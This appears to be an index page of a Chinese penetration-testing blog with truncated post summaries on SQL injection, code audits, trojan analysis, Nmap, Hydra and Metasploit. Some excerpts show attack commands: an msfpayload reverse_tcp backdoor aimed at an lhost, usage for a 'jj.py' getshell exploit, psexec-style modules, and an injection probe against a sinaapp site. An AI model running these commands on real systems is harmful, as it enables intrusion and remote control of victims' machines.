blck

摘要： 病毒来源：朋友服务器发现此木马 当时为了提样本搞了很久，一直找恢复文件，对提取样本有研究的朋友还请指导指导。 文件名：vister.exe MD5:30866adc2976704bca0f051b5474a1ee 此处创建了一个进程 申明了一个2800大小的Space.buffer 并将地址mov到 阅读全文

摘要： PHP数据库操作：从MySQL原生API到PDO test 本文将举详细例子向大家展示PHP是如何使用MySQL原生API、MySQLi面向过程、MySQLi面向对象、PDO操作MySQL数据库的。 为了后面的测试，先建立数据库表test。包含表名user,score。 CREATE TABLE ` 阅读全文

摘要： 入口点变异push EBP 出栈pop EBP 压栈SUB ESP 68 > ADD ESP -68CALL 获取跳转地址直接跳转 cmp a,b 比较a与bmov a,b 把b的值送给aret 返回主程序nop 无作用,英文“no operation”的简写，意思是“do nothing”(机器码 阅读全文

摘要： SWF代码如下： 其中XMLConfig(_local2.url) 未经过过滤传到_local14 _Local14变量初始化。 _local2.url为获取外部参数。 如果要问我为什么，往上走看到parameters。 可控，走到XMLConfig为获取XML。 找到XML地址、如下： logou 阅读全文

摘要： Boolean-based blind SQL injection（布尔型注入） Error-based SQL injection（报错型注入） UNION query SQL injection（可联合查询注入） Stacked queries SQL injection（可多语句查询注入） T 阅读全文

摘要： 想必在用爬虫进行抓取URL的时候，结果需要进行筛选。 http：//可用notepad进行批量去掉。 但是如果遇到这种该怎么处理呢。 http://www.baidu.com/sdasd/asdasd http://www.soso.com/asd.html 标红部分。 这里用gvim这款编辑器确实 阅读全文

摘要： 端口扫描基础 虽然Nmap这些年来功能越来越多， 它也是从一个高效的端口扫描器开始的，并且那仍然是它的核心功能。 nmap <target>这个简单的命令扫描主机<target>上的超过 1660个TCP端口。 。许多传统的端口扫描器只列出所有端口是开放还是关闭的， Nmap的信息粒度比它们要细得多 阅读全文

摘要： 为了对抗 DDoS(分布式拒绝服务)攻击，你需要对攻击时发生了什么有一个清楚的理解. 简单来讲，DDoS 攻击可以通过利用服务器上的漏洞，或者消耗服务器上的资源(例如 内存、硬盘等等)来达到目的。DDoS 攻击主要要两大类: 带宽耗尽攻击和资源耗尽攻击. 为了有效遏制这两种类型的攻击，你可以按照下面 阅读全文

摘要： 01. apostrophemask.py 用UTF-8全角字符替换单引号字符 02. apostrophenullencode.py 用非法双字节unicode字符替换单引号字符 03. appendnullbyte.py 在payload末尾添加空字符编码 04. base64encode.py 阅读全文

摘要： 全局都使用dede的防注入函数，这个就留给大家去想办法了。。我们跟踪到duomi\member\member.php}elseif($action=='chgpwdsubmit'){ if(trim($newpwd)trim($newpwd2)) { ShowMsg('两次输入密码不一致','-1... 阅读全文

摘要： 经朋友所托得到这个管理系统进行审计。 环境搭建好后一大推错误，后来验证码又不显示，折腾了好久，最后没找到原因，直接把验证码去掉了。（不涉及登陆） 跟进到认证登录处文件查看,代码如下： 直接看关键部分。 获取表单过来的user进行判断出，开始以为存在注入，因为没有进行校验和过滤。 后来才看到正则进行了 阅读全文

摘要： 看文件 :/framework/model/www/site_model.php 66行估计主机头注入很少能发现。在多处调用了我们就直接拿留言板处测试。public function get_one_from_domain($domain='') { $sql = "SELECT site_id F... 阅读全文

摘要： 想起早些年就已经很少玩审计了，后来因为合作方的原因就down了一份源码分析了一些，在很多地方都调用过滤函数。最后在评论一处发现了未过滤的地方，我们看看。见文件：function\plugs\Comment\product-content.php 97-109行$sql="insert into `o... 阅读全文

摘要： 反弹的shell,这里介绍两种payload： Windows/meterpreter/reverse_tcp Windows/meterpreter/reverse_https windows/meterpreter/reverse_http 生成反弹后门： msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.1 lport=... 阅读全文

摘要： 利用脚本。exp：python jj.py http://123.123.123.123 ->直接GETSHELL python jj.py http://123.123.123.123 "whoami" ->执行命令#author:we8i&90secimport url... 阅读全文

摘要： 下面附上内网渗透中可能用得上的msf 模块 scanner/portscan/syn SYN端口扫描scanner/portscan/tcp TCP端口扫描 auxiliary/scanner/smb/smb_login SMB登录测试扫描use windows/smb/psexec SMB登录，可 阅读全文

摘要： 手头的事做完了，看到朋友空间转个骗人抽奖的网站，不知道怎么的就跳转到sinaapp网站下了然后旁注到这个站，记录一下很少能遇见手工的注入的站了。 http://xxx.sinaapp.com/species_show.php?id=1%20order%20by%2018 经过order by的测试为 阅读全文

摘要： 有空的时候做了个视频跟大家一起学习一下，顺便留个纪念，现在发现有些知识不分享慢慢的自己都会淡化，一段时间回过头来看发现还蛮有意思。http://pan.baidu.com/s/1ntCh8Ateba6 阅读全文

该文被密码保护。 阅读全文

摘要： hydra下载地址：http://www.thc.org/releases/hydra-7.3.tar.gz # tar zxvf hydra-7.0-src.tar.gz # cd hydra-7.0-src # ./configure # make # make install hydra支持G 阅读全文